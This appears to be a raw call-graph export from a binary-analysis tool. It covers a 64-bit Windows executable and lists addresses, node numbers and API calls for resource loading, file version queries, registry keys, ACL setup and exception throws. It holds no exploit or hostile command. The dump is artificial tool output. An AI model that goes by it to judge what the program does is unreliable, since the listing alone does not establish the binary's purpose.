_CxxThrowException 32936->32937 32938 7ff780fa595c free 32936->32938 32937->32933 32939 7ff780fdce24 32938->32939 32940 7ff780fdd101 _CxxThrowException 32939->32940 32981 7ff780fdd9d4 32939->32981 32940->32937 32942 7ff780fdce42 32943 7ff780fdd0eb _CxxThrowException 32942->32943 32944 7ff780fdd9d4 2 API calls 32942->32944 32943->32940 32945 7ff780fdce59 GetStdHandle GetStdHandle 32944->32945 32946 7ff780fdd0d5 _CxxThrowException 32945->32946 32947 7ff780fdce91 32945->32947 32946->32943 32992 7ff780fa0dd0 32947->32992 32950 7ff780f92c78 24 API calls 32951 7ff780fdceca 32950->32951 32952 7ff780fdd0bf _CxxThrowException 32951->32952 33007 7ff780fa1e80 32951->33007 32952->32946 32954 7ff780fdd0a9 _CxxThrowException 32954->32952 32955 7ff780fa0dd0 35 API calls 32956 7ff780fdcf0b 32955->32956 32957 7ff780f92c78 24 API calls 32956->32957 32958 7ff780fdcf36 32957->32958 32959 7ff780fdd093 _CxxThrowException 32958->32959 32968 7ff780fa1e80 38 API calls 32958->32968 32959->32954 32960 7ff780fdcf59 32961 7ff780fdcf63 CreateFileW 32960->32961 32964 7ff780fdcf98 32960->32964 32961->32964 32962 7ff780fdd07d _CxxThrowException 32962->32959 32963 7ff780f9eb6f 32963->32877 32964->32962 32964->32963 32965 7ff780fdd067 _CxxThrowException 32964->32965 32966 7ff780fdd051 _CxxThrowException 32964->32966 32967 7ff780fdd03b _CxxThrowException 32964->32967 32965->32962 32966->32965 32967->32966 32968->32960 32970->32881 32971->32893 32972->32892 32973->32911 32976 7ff780fa59b0 32975->32976 32977 7ff780fa5982 32975->32977 32979 7ff7810a458c numpunct free 32976->32979 32978 7ff7810a458c numpunct free 32977->32978 32980 7ff780fa5987 32978->32980 32979->32980 32980->32936 32982 7ff780fdd9e5 32981->32982 32983 7ff780fdda31 32981->32983 32984 7ff780fdd9f4 32982->32984 32985 7ff780fdda12 32982->32985 32987 7ff7810a458c numpunct free 32983->32987 32989 7ff780fdd9f9 32983->32989 32988 7ff7810a458c numpunct free 32984->32988 32986 7ff7810a458c numpunct free 32985->32986 32986->32989 32990 7ff780fdda5e 32987->32990 32988->32989 32989->32942 32990->32989 33012 7ff780fdd310 ldiv 32990->33012 32993 7ff780fa0e03 32992->32993 32994 7ff780fa0e0c 32992->32994 32993->32994 32995 7ff780fa0e13 GetHandleInformation 32993->32995 32994->32950 32996 7ff780fa0e3c GetFileType 32995->32996 32997 7ff780fa0e2b GetLastError 32995->32997 32998 7ff780fa0e65 32996->32998 32999 7ff780fa0e55 GetLastError 32996->32999 32997->32994 33000 7ff780fa0e7f 32998->33000 33013 7ff780fa3d00 32998->33013 32999->32997 32999->32998 33021 7ff780fdd214 20 API calls numpunct 33000->33021 33003 7ff780fa0e94 33022 7ff780fdd14c 27 API calls numpunct 33003->33022 33005 7ff780fa0eb2 33005->32994 33023 7ff780fdd310 ldiv 33005->33023 33024 7ff780fa1580 33007->33024 33010 7ff780f92c78 24 API calls 33011 7ff780fa1ebf 33010->33011 33011->32954 33011->32955 33012->32989 33014 7ff780fa3d09 33013->33014 33020 7ff780fa3dba 33013->33020 33015 7ff780fa595c free 33014->33015 33018 7ff780fa3d7e 33014->33018 33015->33018 33016 7ff780fa3db1 33019 7ff7810a458c numpunct free 33016->33019 33017 7ff780fa3d99 memmove 33017->33016 33018->33016 33018->33017 33019->33020 33020->33000 33021->33003 33022->33005 33023->32994 33025 7ff780fa15b3 33024->33025 33026 7ff780fa15bc 33024->33026 33025->33026 33027 7ff780fa15c3 GetHandleInformation 33025->33027 33026->33010 33028 7ff780fa15ec GetFileType 33027->33028 33029 7ff780fa15db GetLastError 33027->33029 33030 7ff780fa1615 33028->33030 33031 7ff780fa1605 GetLastError 33028->33031 33029->33026 33032 7ff780fa162f 33030->33032 33039 7ff780fa4294 memmove free numpunct 33030->33039 33031->33029 33031->33030 33040 7ff780fdd214 20 API calls numpunct 33032->33040 33035 7ff780fa1644 33041 7ff780fdd14c 27 API calls numpunct 33035->33041 33037 7ff780fa1662 33037->33026 33042 7ff780fdd310 ldiv 33037->33042 33039->33032 33040->33035 33041->33037 33042->33026 33043 7ff780fac91c 33044 7ff780fac945 33043->33044 33045 7ff780facef3 _CxxThrowException 33043->33045 33046 7ff780fa8410 29 API calls 33044->33046 33047 7ff780facf08 _CxxThrowException 33045->33047 33048 7ff780fac94d 33046->33048 33049 7ff780facf1d _CxxThrowException 33047->33049 33050 7ff780fac968 GetModuleFileNameW 33048->33050 33287 7ff780fa86a4 33048->33287 33051 7ff780facf32 _CxxThrowException 33049->33051 33054 7ff780fac9bc 33050->33054 33055 7ff780fac98c 33050->33055 33053 7ff780facf47 _CxxThrowException 33051->33053 33059 7ff780facf5c _CxxThrowException 33053->33059 33056 7ff780fac9c1 GetLastError 33054->33056 33057 7ff780fac9e7 33054->33057 33060 7ff780fa8810 31 API calls 33055->33060 33061 7ff780fa8410 29 API calls 33056->33061 33062 7ff780fa8810 31 API calls 33057->33062 33063 7ff780facf71 _CxxThrowException 33059->33063 33064 7ff780fac994 GetModuleFileNameW 33060->33064 33065 7ff780fac9d7 SetLastError 33061->33065 33066 7ff780fac9f2 33062->33066 33067 7ff780facf86 _CxxThrowException 33063->33067 33064->33054 33064->33055 33068 7ff780fac9fa GetLastError 33065->33068 33066->33068 33069 7ff780faca5f 33066->33069 33070 7ff780facf9b _CxxThrowException 33067->33070 33306 7ff780fdc700 GetModuleHandleW 33068->33306 33072 7ff780facede _CxxThrowException 33069->33072 33171 7ff780fa8be8 33069->33171 33073 7ff780facfb0 _CxxThrowException 33070->33073 33072->33045 33074 7ff780facfc5 _CxxThrowException 33073->33074 33077 7ff780facfda _CxxThrowException 33074->33077 33075 7ff780faca1f SetLastError GetLastError 33371 7ff780fce694 55 API calls numpunct 33075->33371 33079 7ff780facfef _CxxThrowException 33077->33079 33080 7ff780faca53 33081 7ff780faca74 33081->33079 33086 7ff780facabc 33081->33086 33372 7ff780fa8978 30 API calls std::bad_exception::bad_exception 33081->33372 33083 7ff780facb16 33084 7ff780fa7e24 free 33083->33084 33085 7ff780facb26 33084->33085 33085->33074 33090 7ff780fa8be8 34 API calls 33085->33090 33086->33077 33086->33083 33087 7ff780facb0e 33086->33087 33088 7ff7810a458c numpunct free 33086->33088 33089 7ff7810a458c numpunct free 33087->33089 33088->33087 33089->33083 33091 7ff780facb3b 33090->33091 33092 7ff780fa8010 7 API calls 33091->33092 33093 7ff780facb4b 33092->33093 33195 7ff780faf0dc 33093->33195 33095 7ff780facb82 33096 7ff780fa7e24 free 33095->33096 33099 7ff780facb93 33096->33099 33098 7ff780facb7a 33101 7ff7810a458c numpunct free 33098->33101 33099->33073 33216 7ff780fa25a8 33099->33216 33100 7ff7810a458c numpunct free 33100->33098 33101->33095 33103 7ff780facbb3 33104 7ff780fa7e24 free 33103->33104 33105 7ff780facbc2 33104->33105 33234 7ff780fae868 33105->33234 33108 7ff780facbe8 FindResourceW 33110 7ff780face92 GetLastError 33108->33110 33111 7ff780facc1d 33108->33111 33109 7ff780facbcb GetLastError 33109->33108 33112 7ff780fdc700 93 API calls 33110->33112 33373 7ff780fde080 LoadResource SizeofResource LockResource 33111->33373 33114 7ff780faceb7 SetLastError GetLastError 33112->33114 33114->33072 33115 7ff780facc29 33115->33110 33116 7ff780facc3b 33115->33116 33117 7ff780faccc3 33115->33117 33118 7ff780fa8010 7 API calls 33116->33118 33117->33070 33119 7ff780fdc700 93 API calls 33117->33119 33120 7ff780facc4b 33118->33120 33121 7ff780faccea 33119->33121 33374 7ff780fde178 69 API calls 33120->33374 33123 7ff780fa9c0c 38 API calls 33121->33123 33124 7ff780faccf9 33123->33124 33125 7ff780fa2944 38 API calls 33124->33125 33128 7ff780facd04 33125->33128 33126 7ff780facc9a 33127 7ff780fa7e24 free 33126->33127 33130 7ff780faccc1 33127->33130 33131 7ff780fa28c4 36 API calls 33128->33131 33129 7ff780facc59 33129->33047 33129->33126 33132 7ff780facc92 33129->33132 33135 7ff7810a458c numpunct free 33129->33135 33134 7ff780fa8010 7 API calls 33130->33134 33131->33130 33133 7ff7810a458c numpunct free 33132->33133 33133->33126 33136 7ff780facd1c 33134->33136 33135->33132 33136->33067 33375 7ff780fac894 39 API calls numpunct 33136->33375 33138 7ff780facd3d 33138->33063 33376 7ff780fac894 39 API calls numpunct 33138->33376 33140 7ff780facd60 33377 7ff780fa8148 33140->33377 33144 7ff780facd8c 33145 7ff780fa7e24 free 33144->33145 33146 7ff780facd96 33145->33146 33147 7ff780fa8010 7 API calls 33146->33147 33148 7ff780facda6 33147->33148 33149 7ff780faf0dc 33 API calls 33148->33149 33151 7ff780facdb4 33149->33151 33150 7ff780facdf5 33152 7ff780fa7e24 free 33150->33152 33151->33053 33151->33150 33154 7ff780facded 33151->33154 33155 7ff7810a458c numpunct free 33151->33155 33153 7ff780face05 33152->33153 33153->33051 33157 7ff780fa8a40 GetStringTypeExW 33153->33157 33156 7ff7810a458c numpunct free 33154->33156 33155->33154 33156->33150 33160 7ff780face1a 33157->33160 33158 7ff780face81 33159 7ff780fa7e24 free 33158->33159 33161 7ff780face8b 33159->33161 33160->33049 33160->33158 33162 7ff780fa9c0c 38 API calls 33160->33162 33161->33110 33163 7ff780face59 33162->33163 33391 7ff780faed64 44 API calls numpunct 33163->33391 33165 7ff780face63 33392 7ff780f92e8c 38 API calls 33165->33392 33167 7ff780face6e 33168 7ff780fa2944 38 API calls 33167->33168 33169 7ff780face79 33168->33169 33170 7ff780fa28c4 36 API calls 33169->33170 33170->33158 33172 7ff780fa8d57 33171->33172 33173 7ff780fa8c04 33171->33173 33172->33081 33174 7ff780fa9630 7 API calls 33173->33174 33175 7ff780fa8c09 33174->33175 33176 7ff780fa9630 7 API calls 33175->33176 33177 7ff780fa8c11 33176->33177 33178 7ff780fa9630 7 API calls 33177->33178 33182 7ff780fa8c2a 33178->33182 33179 7ff780fa8d59 33181 7ff780fa8410 29 API calls 33179->33181 33180 7ff780fa8c3a GetStringTypeExW 33180->33182 33181->33172 33182->33179 33182->33180 33183 7ff780fa8c88 33182->33183 33183->33179 33184 7ff780fa8c91 33183->33184 33185 7ff780fa9630 7 API calls 33184->33185 33186 7ff780fa8c99 33185->33186 33187 7ff780fa8cbe 33186->33187 33188 7ff780fa8810 31 API calls 33186->33188 33189 7ff780fa9630 7 API calls 33187->33189 33188->33187 33190 7ff780fa8cc9 33189->33190 33190->33172 33191 7ff780fa8ce0 GetStringTypeExW 33190->33191 33192 7ff780fa8d2e 33190->33192 33191->33190 33192->33172 33193 7ff780fa8d33 memmove 33192->33193 33194 7ff780fa8810 31 API calls 33193->33194 33194->33172 33196 7ff780fa80d4 6 API calls 33195->33196 33197 7ff780faf103 33196->33197 33198 7ff780fa8410 29 API calls 33197->33198 33199 7ff780faf10e 33198->33199 33200 7ff780faf124 33199->33200 33201 7ff780faf117 33199->33201 33203 7ff780fa86a4 30 API calls 33200->33203 33202 7ff780fa80d4 6 API calls 33201->33202 33215 7ff780faf11f 33202->33215 33204 7ff780faf133 ExpandEnvironmentStringsW 33203->33204 33205 7ff780faf18a 33204->33205 33206 7ff780faf15d 33204->33206 33209 7ff780faf193 33205->33209 33210 7ff780faf19a 33205->33210 33208 7ff780fa86a4 30 API calls 33206->33208 33207 7ff780fa7e24 free 33211 7ff780facb59 33207->33211 33212 7ff780faf16a ExpandEnvironmentStringsW 33208->33212 33213 7ff780fa8410 29 API calls 33209->33213 33393 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 33210->33393 33211->33095 33211->33098 33211->33100 33212->33205 33213->33215 33215->33207 33217 7ff780fa2642 33216->33217 33220 7ff780fa25d6 33216->33220 33398 7ff780f930f0 25 API calls numpunct 33217->33398 33219 7ff780fa265c 33399 7ff780f91dcc 14 API calls std::bad_exception::bad_exception 33219->33399 33221 7ff780fa2630 _CxxThrowException 33220->33221 33222 7ff780fa25f5 33220->33222 33221->33217 33394 7ff780fabd1c 33222->33394 33225 7ff780fa266a _CxxThrowException __uncaught_exception 33227 7ff780fa26a0 33225->33227 33228 7ff780fa26a8 33225->33228 33400 7ff780fa52a0 36 API calls 33227->33400 33230 7ff780fa26c6 33228->33230 33401 7ff7810a48b8 LeaveCriticalSection 33228->33401 33230->33103 33231 7ff7810a5990 7 API calls 33233 7ff780fa2626 33231->33233 33233->33103 33235 7ff780fae895 GetFileVersionInfoSizeExW 33234->33235 33236 7ff780faeb87 _CxxThrowException 33234->33236 33237 7ff780fae8b2 33235->33237 33244 7ff780fae8fc 33235->33244 33238 7ff780faeb9c _CxxThrowException 33236->33238 33237->33238 33239 7ff780fae8c2 GetLastError 33237->33239 33240 7ff780faebb1 _CxxThrowException 33238->33240 33402 7ff780fce694 55 API calls numpunct 33239->33402 33242 7ff780faebc6 _CxxThrowException 33240->33242 33243 7ff780faebdb _CxxThrowException 33242->33243 33247 7ff780faebf0 _CxxThrowException 33243->33247 33245 7ff780fae927 GetFileVersionInfoW 33244->33245 33246 7ff780faecad _CxxThrowException 33244->33246 33248 7ff780facbc7 33244->33248 33249 7ff780fae991 VerQueryValueW 33245->33249 33250 7ff780fae947 33245->33250 33251 7ff780faec05 _CxxThrowException 33247->33251 33248->33108 33248->33109 33254 7ff780fae9b3 33249->33254 33255 7ff780fae9e4 33249->33255 33250->33240 33252 7ff780fae957 GetLastError 33250->33252 33253 7ff780faec1a _CxxThrowException 33251->33253 33256 7ff780fae976 33252->33256 33257 7ff780faec2f _CxxThrowException 33253->33257 33254->33242 33258 7ff780fae9c3 GetLastError 33254->33258 33259 7ff780faec98 _CxxThrowException 33255->33259 33262 7ff780fa86a4 30 API calls 33255->33262 33403 7ff780fce694 55 API calls numpunct 33256->33403 33261 7ff780faec44 _CxxThrowException 33257->33261 33258->33256 33259->33246 33264 7ff780faec59 _CxxThrowException 33261->33264 33265 7ff780faea09 33262->33265 33263 7ff780fae98a 33268 7ff7810a458c numpunct free 33263->33268 33266 7ff780faec6e _CxxThrowException 33264->33266 33267 7ff780faec83 _CxxThrowException 33265->33267 33404 7ff780fa8b64 38 API calls 33265->33404 33266->33267 33267->33259 33268->33248 33270 7ff780faea2b 33270->33266 33271 7ff780faea3b VerQueryValueW 33270->33271 33272 7ff780faea91 33271->33272 33273 7ff780faea5d 33271->33273 33272->33264 33405 7ff780faacb8 33272->33405 33273->33243 33274 7ff780faea6d GetLastError 33273->33274 33274->33272 33277 7ff780fa86a4 30 API calls 33278 7ff780faeac4 33277->33278 33278->33257 33418 7ff780fa8b64 38 API calls 33278->33418 33280 7ff780faeae6 33280->33253 33281 7ff780faeaf6 VerQueryValueW 33280->33281 33282 7ff780faeb18 33281->33282 33283 7ff780faeb4c 33281->33283 33282->33247 33284 7ff780faeb28 GetLastError 33282->33284 33283->33251 33285 7ff780faeb5c 33283->33285 33284->33283 33286 7ff780faacb8 35 API calls 33285->33286 33286->33263 33288 7ff780fa8771 33287->33288 33289 7ff780fa86e2 33287->33289 33454 7ff780f930f0 25 API calls numpunct 33288->33454 33290 7ff780fa9630 7 API calls 33289->33290 33292 7ff780fa86e7 33290->33292 33296 7ff7810a4540 numpunct 2 API calls 33292->33296 33301 7ff780fa8748 33292->33301 33293 7ff780fa878b 33455 7ff780f91e60 14 API calls std::bad_exception::bad_exception 33293->33455 33295 7ff7810a5990 7 API calls 33298 7ff780fa875b 33295->33298 33299 7ff780fa86fa 33296->33299 33297 7ff780fa8799 _CxxThrowException 33298->33050 33302 7ff780fa8719 33299->33302 33453 7ff780fabf80 29 API calls std::bad_exception::bad_exception 33299->33453 33301->33295 33302->33301 33303 7ff780fa8740 33302->33303 33304 7ff7810a458c numpunct free 33302->33304 33305 7ff7810a458c numpunct free 33303->33305 33304->33303 33305->33301 33307 7ff780fdc74c 33306->33307 33456 7ff780fdc5d8 33307->33456 33310 7ff780fdc88f 33314 7ff780fdc8a7 _CxxThrowException 33310->33314 33311 7ff780fdc7b8 SizeofResource 33312 7ff780fdc7d2 LoadResource 33311->33312 33313 7ff780fdc8b8 33311->33313 33315 7ff780fdc8e4 33312->33315 33316 7ff780fdc7ed LockResource 33312->33316 33317 7ff780fdc8d3 _CxxThrowException 33313->33317 33314->33313 33318 7ff780fdc8ff _CxxThrowException 33315->33318 33319 7ff780fdc910 33316->33319 33325 7ff780fdc808 33316->33325 33317->33315 33318->33319 33320 7ff780fdc92b _CxxThrowException 33319->33320 33321 7ff780fdc93c 33320->33321 33326 7ff780fdc957 _CxxThrowException 33321->33326 33322 7ff780fdc968 33324 7ff780fdc983 _CxxThrowException 33322->33324 33323 7ff780fdc841 33323->33075 33328 7ff780fdc99c 33324->33328 33325->33321 33325->33322 33325->33323 33327 7ff780fdc87e _CxxThrowException 33325->33327 33326->33322 33327->33310 33329 7ff780fdc700 57 API calls 33328->33329 33330 7ff780fdc9bb 33329->33330 33331 7ff780fdca86 33330->33331 33332 7ff780fdc9cc EnterCriticalSection LeaveCriticalSection vswprintf_s 33330->33332 33335 7ff780fdcaa4 _CxxThrowException 33331->33335 33333 7ff780fdca44 33332->33333 33334 7ff780fdca53 33332->33334 33333->33075 33336 7ff780fdca74 _CxxThrowException 33334->33336 33337 7ff780fdc5d8 53 API calls 33335->33337 33336->33331 33338 7ff780fdcaee FindResourceW 33337->33338 33339 7ff780fdcbf1 GetLastError 33338->33339 33340 7ff780fdcb2c LoadResource 33338->33340 33472 7ff780f93230 GetProcessHeap HeapAlloc memmove _CxxThrowException 33339->33472 33341 7ff780fdcc20 GetLastError 33340->33341 33342 7ff780fdcb47 LockResource 33340->33342 33473 7ff780f93230 GetProcessHeap HeapAlloc memmove _CxxThrowException 33341->33473 33344 7ff780fdcc4f GetLastError 33342->33344 33345 7ff780fdcb62 SizeofResource 33342->33345 33474 7ff780f93230 GetProcessHeap HeapAlloc memmove _CxxThrowException 33344->33474 33349 7ff780fdcc7e GetLastError 33345->33349 33350 7ff780fdcb7d 33345->33350 33346 7ff780fdcc0f _CxxThrowException 33346->33341 33475 7ff780f93230 GetProcessHeap HeapAlloc memmove _CxxThrowException 33349->33475 33355 7ff780fdcba8 33350->33355 33356 7ff780fdccad GetLastError 33350->33356 33351 7ff780fdcc3e _CxxThrowException 33351->33344 33352 7ff780fdcc6d _CxxThrowException 33352->33349 33354 7ff780fdcc9c _CxxThrowException 33354->33356 33357 7ff780fdcce4 GetLastError 33355->33357 33358 7ff780fdcbb2 33355->33358 33476 7ff780f93230 GetProcessHeap HeapAlloc memmove _CxxThrowException 33356->33476 33477 7ff780f93230 GetProcessHeap HeapAlloc memmove _CxxThrowException 33357->33477 33360 7ff780fdcbc0 33358->33360 33478 7ff780f93264 GetProcessHeap HeapAlloc memmove _CxxThrowException 33358->33478 33360->33075 33362 7ff780fdccd3 _CxxThrowException 33362->33357 33363 7ff780fdcd02 _CxxThrowException 33363->33358 33365 7ff780fdcd23 _CxxThrowException 33366 7ff780fdcd5d 33365->33366 33368 7ff780fdcd79 33365->33368 33367 7ff780fdcd63 memmove 33366->33367 33366->33368 33367->33368 33479 7ff780f93264 GetProcessHeap HeapAlloc memmove _CxxThrowException 33368->33479 33370 7ff780fdcd9e _CxxThrowException 33371->33080 33372->33086 33373->33115 33374->33129 33375->33138 33376->33140 33378 7ff780fa81e4 33377->33378 33382 7ff780fa8177 33377->33382 33604 7ff780f930f0 25 API calls numpunct 33378->33604 33380 7ff780fa81fe 33605 7ff780f91dcc 14 API calls std::bad_exception::bad_exception 33380->33605 33383 7ff780fa81d2 _CxxThrowException 33382->33383 33384 7ff780fa8197 33382->33384 33383->33378 33573 7ff780faba6c 33384->33573 33385 7ff780fa820c _CxxThrowException 33388 7ff7810a5990 7 API calls 33389 7ff780fa81c8 33388->33389 33389->33059 33390 7ff780fac894 39 API calls numpunct 33389->33390 33390->33144 33391->33165 33392->33167 33393->33215 33395 7ff780fabd3f 33394->33395 33396 7ff780fa2611 33394->33396 33395->33396 33397 7ff780fabd76 CompareStringW 33395->33397 33396->33231 33397->33396 33398->33219 33399->33225 33400->33228 33402->33248 33403->33263 33404->33270 33406 7ff780faad43 33405->33406 33408 7ff780faace6 33405->33408 33445 7ff780f930f0 25 API calls numpunct 33406->33445 33410 7ff780faad31 _CxxThrowException 33408->33410 33411 7ff780faad06 33408->33411 33409 7ff780faad5a 33446 7ff780f91dcc 14 API calls std::bad_exception::bad_exception 33409->33446 33410->33406 33419 7ff780fac348 33411->33419 33413 7ff780faad68 _CxxThrowException 33416 7ff7810a5990 7 API calls 33417 7ff780faad27 33416->33417 33417->33261 33417->33277 33418->33280 33420 7ff780fac380 33419->33420 33421 7ff780fac46d 33419->33421 33422 7ff780fac433 33420->33422 33423 7ff780fac38a 33420->33423 33451 7ff780f930f0 25 API calls numpunct 33421->33451 33449 7ff780f930f0 25 API calls numpunct 33422->33449 33426 7ff780fac3b3 33423->33426 33429 7ff780fac39a memmove 33423->33429 33425 7ff780fac487 33452 7ff780f91dcc 14 API calls std::bad_exception::bad_exception 33425->33452 33430 7ff7810a4540 numpunct 2 API calls 33426->33430 33447 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 33429->33447 33434 7ff780fac3bd 33430->33434 33431 7ff780fac44d 33450 7ff780f91e60 14 API calls std::bad_exception::bad_exception 33431->33450 33432 7ff780fac495 _CxxThrowException 33440 7ff780fac3e5 33434->33440 33448 7ff780fabf80 29 API calls std::bad_exception::bad_exception 33434->33448 33436 7ff780fac3b1 33439 7ff7810a5990 7 API calls 33436->33439 33437 7ff780fac45b _CxxThrowException 33437->33421 33441 7ff780faad14 33439->33441 33440->33436 33442 7ff780fac40c 33440->33442 33443 7ff7810a458c numpunct free 33440->33443 33441->33416 33444 7ff7810a458c numpunct free 33442->33444 33443->33442 33444->33436 33445->33409 33446->33413 33447->33436 33448->33440 33449->33431 33450->33437 33451->33425 33452->33432 33453->33302 33454->33293 33455->33297 33457 7ff780fdc5f4 33456->33457 33458 7ff780fdc601 EnterCriticalSection 33456->33458 33480 7ff780fdc508 GetProcessHeap HeapAlloc 33457->33480 33459 7ff780fdc625 33458->33459 33460 7ff780fdc63b 33458->33460 33459->33460 33464 7ff780fdc6da LeaveCriticalSection 33459->33464 33462 7ff780fdc6b3 LeaveCriticalSection 33460->33462 33465 7ff780fdc646 GetModuleFileNameW 33460->33465 33466 7ff780fdc6c6 FindResourceW 33462->33466 33464->33466 33465->33462 33467 7ff780fdc668 33465->33467 33466->33310 33466->33311 33468 7ff780fdc66c GetLastError 33467->33468 33469 7ff780fdc67d 33467->33469 33468->33462 33468->33469 33484 7ff781019ba4 33469->33484 33472->33346 33473->33351 33474->33352 33475->33354 33476->33362 33477->33363 33478->33365 33479->33370 33481 7ff780fdc543 memset SetCriticalSectionSpinCount SetCriticalSectionSpinCount 33480->33481 33482 7ff780fdc539 33480->33482 33481->33482 33482->33458 33482->33466 33548 7ff7810195fc 33484->33548 33487 7ff781019c18 33488 7ff781019c25 SearchPathW 33487->33488 33515 7ff78101a0dc 33487->33515 33490 7ff781019c5d FindResourceExW 33488->33490 33491 7ff78101a0e4 FreeLibrary 33488->33491 33489 7ff7810a5990 7 API calls 33492 7ff780fdc689 33489->33492 33494 7ff781019ca9 33490->33494 33495 7ff781019f26 33490->33495 33491->33515 33492->33462 33496 7ff781019cb7 GetUserDefaultUILanguage 33494->33496 33497 7ff781019f89 33494->33497 33498 7ff781019f30 FreeLibrary 33495->33498 33495->33515 33499 7ff781019cd8 GetLocaleInfoW 33496->33499 33521 7ff781019d23 33496->33521 33497->33495 33565 7ff7810198e8 11 API calls 33497->33565 33500 7ff7810195fc 10 API calls 33498->33500 33502 7ff781019cff wcsncmp 33499->33502 33499->33521 33504 7ff781019f44 33500->33504 33502->33521 33506 7ff781019f4c 33504->33506 33507 7ff78101a0bd 33504->33507 33505 7ff781019f92 33566 7ff781019b2c memmove bsearch SetLastError bsearch SetLastError 33505->33566 33563 7ff780faf7c0 _vsnwprintf 33506->33563 33509 7ff7810195fc 10 API calls 33507->33509 33513 7ff78101a0c2 LoadLibraryExW 33509->33513 33511 7ff781019fae 33511->33495 33517 7ff781019fd0 33511->33517 33567 7ff781019874 22 API calls 33511->33567 33512 7ff78101a0a9 FreeLibrary 33512->33515 33513->33515 33514 7ff781019f71 33564 7ff78101950c 6 API calls 33514->33564 33515->33489 33517->33512 33524 7ff781019ff8 33517->33524 33568 7ff781019874 22 API calls 33517->33568 33518 7ff781019f84 33518->33515 33520 7ff781019874 22 API calls 33520->33521 33521->33512 33521->33520 33525 7ff781019ddf GetSystemDefaultUILanguage 33521->33525 33533 7ff781019f15 33521->33533 33555 7ff781019b2c memmove bsearch SetLastError bsearch SetLastError 33521->33555 33523 7ff78101a028 33523->33512 33529 7ff78101a073 33523->33529 33570 7ff781019b2c memmove bsearch SetLastError bsearch SetLastError 33523->33570 33524->33512 33524->33523 33569 7ff781019874 22 API calls 33524->33569 33526 7ff781019e90 33525->33526 33527 7ff781019df9 33525->33527 33526->33512 33542 7ff781019eec 33526->33542 33560 7ff781019b2c memmove bsearch SetLastError bsearch SetLastError 33526->33560 33556 7ff781019b2c memmove bsearch SetLastError bsearch SetLastError 33527->33556 33529->33512 33534 7ff78101a098 33529->33534 33572 7ff781019874 22 API calls 33529->33572 33533->33495 33533->33512 33534->33495 33534->33512 33535 7ff78101a059 33535->33529 33571 7ff781019874 22 API calls 33535->33571 33536 7ff781019e11 33536->33495 33543 7ff781019e33 33536->33543 33557 7ff781019874 22 API calls 33536->33557 33541 7ff781019ed2 33541->33542 33561 7ff781019874 22 API calls 33541->33561 33542->33512 33542->33533 33562 7ff781019874 22 API calls 33542->33562 33543->33512 33546 7ff781019e60 33543->33546 33558 7ff781019874 22 API calls 33543->33558 33546->33512 33546->33526 33559 7ff781019874 22 API calls 33546->33559 33549 7ff781019700 33548->33549 33550 7ff781019623 memset GetVersionExW 33548->33550 33551 7ff7810a5990 7 API calls 33549->33551 33552 7ff781019652 GetVersionExW 33550->33552 33554 7ff78101966b 33550->33554 33553 7ff781019710 LoadLibraryExW 33551->33553 33552->33554 33553->33487 33553->33515 33554->33549 33555->33521 33556->33536 33557->33543 33558->33546 33559->33526 33560->33541 33561->33542 33562->33533 33563->33514 33564->33518 33565->33505 33566->33511 33567->33517 33568->33524 33569->33523 33570->33535 33571->33529 33572->33534 33574 7ff780fabcd9 33573->33574 33578 7ff780fabac0 33573->33578 33608 7ff780f930f0 25 API calls numpunct 33574->33608 33576 7ff780fabcf3 33609 7ff780f91ef0 14 API calls std::bad_exception::bad_exception 33576->33609 33577 7ff780fabcb4 33580 7ff7810a5990 7 API calls 33577->33580 33578->33577 33581 7ff780fabba6 33578->33581 33584 7ff780fabb21 33578->33584 33583 7ff780fa81b5 33580->33583 33585 7ff7810a4540 numpunct 2 API calls 33581->33585 33582 7ff780fabd04 _CxxThrowException 33583->33388 33587 7ff780fabb2b memmove 33584->33587 33589 7ff780fabb3f 33584->33589 33591 7ff780fabbb0 33585->33591 33586 7ff780fabbde 33592 7ff780fabc23 memmove 33586->33592 33593 7ff780fabbeb 33586->33593 33587->33589 33588 7ff780fabca6 33607 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 33588->33607 33589->33588 33590 7ff780fabb63 memmove 33589->33590 33590->33588 33591->33586 33606 7ff780fabed4 29 API calls std::bad_exception::bad_exception 33591->33606 33597 7ff780fabc3c memmove 33592->33597 33598 7ff780fabc02 33592->33598 33596 7ff780fabbf0 memmove 33593->33596 33593->33598 33596->33598 33597->33598 33599 7ff780fabc79 memmove 33598->33599 33600 7ff780fabc7e 33598->33600 33599->33600 33600->33588 33601 7ff780fabc9e 33600->33601 33602 7ff7810a458c numpunct free 33600->33602 33603 7ff7810a458c numpunct free 33601->33603 33602->33601 33603->33588 33604->33380 33605->33385 33606->33586 33607->33577 33608->33576 33609->33582 33610 7ff780f9ddf4 RegOpenKeyExW 33611 7ff780f9de38 33610->33611 33612 7ff780fce3ac 23 API calls 33611->33612 33618 7ff780f9dec3 33611->33618 33613 7ff780f9de5e RegCreateKeyExW 33612->33613 33616 7ff780f9dead 33613->33616 33613->33618 33614 7ff780f9dee0 33615 7ff780f9ded1 RegCloseKey 33615->33614 33617 7ff780f9deb2 RegCloseKey 33616->33617 33616->33618 33617->33618 33618->33614 33618->33615 33619 7ff780f9e514 LocalAlloc LocalAlloc 33620 7ff780f9e575 33619->33620 33632 7ff780f9e65a 33619->33632 33622 7ff780f9e57e CreateWellKnownSid 33620->33622 33620->33632 33621 7ff780f9e685 33624 7ff780f9e68a LocalFree 33621->33624 33625 7ff780f9e699 33621->33625 33626 7ff780f9e5a2 CreateWellKnownSid 33622->33626 33622->33632 33623 7ff780f9e679 LocalFree 33623->33621 33624->33625 33628 7ff780f9e69e LocalFree 33625->33628 33629 7ff780f9e6ad 33625->33629 33627 7ff780f9e5c6 memset SetEntriesInAclW 33626->33627 33626->33632 33630 7ff780f9e623 InitializeSecurityDescriptor 33627->33630 33627->33632 33628->33629 33631 7ff780f9e63d SetSecurityDescriptorDacl 33630->33631 33630->33632 33631->33632 33632->33621 33632->33623 33633 7ff780fcdc70 33668 7ff780fa7fbc 33633->33668 33636 7ff780fa7fbc 29 API calls 33637 7ff780fcdcb4 33636->33637 33673 7ff780fa941c 33637->33673 33640 7ff780fcdcfb 33697 7ff780fd6f18 33640->33697 33641 7ff780fa8148 39 API calls 33643 7ff780fcdcdb 33641->33643 33643->33640 33646 7ff780fcdce8 33643->33646 33644 7ff780fa7e24 free 33647 7ff780fcdebf 33644->33647 33645 7ff780fa8148 39 API calls 33648 7ff780fcdd1c CreateFileW 33645->33648 33649 7ff780faacb8 35 API calls 33646->33649 33650 7ff780fa7e24 free 33647->33650 33651 7ff780fcdd62 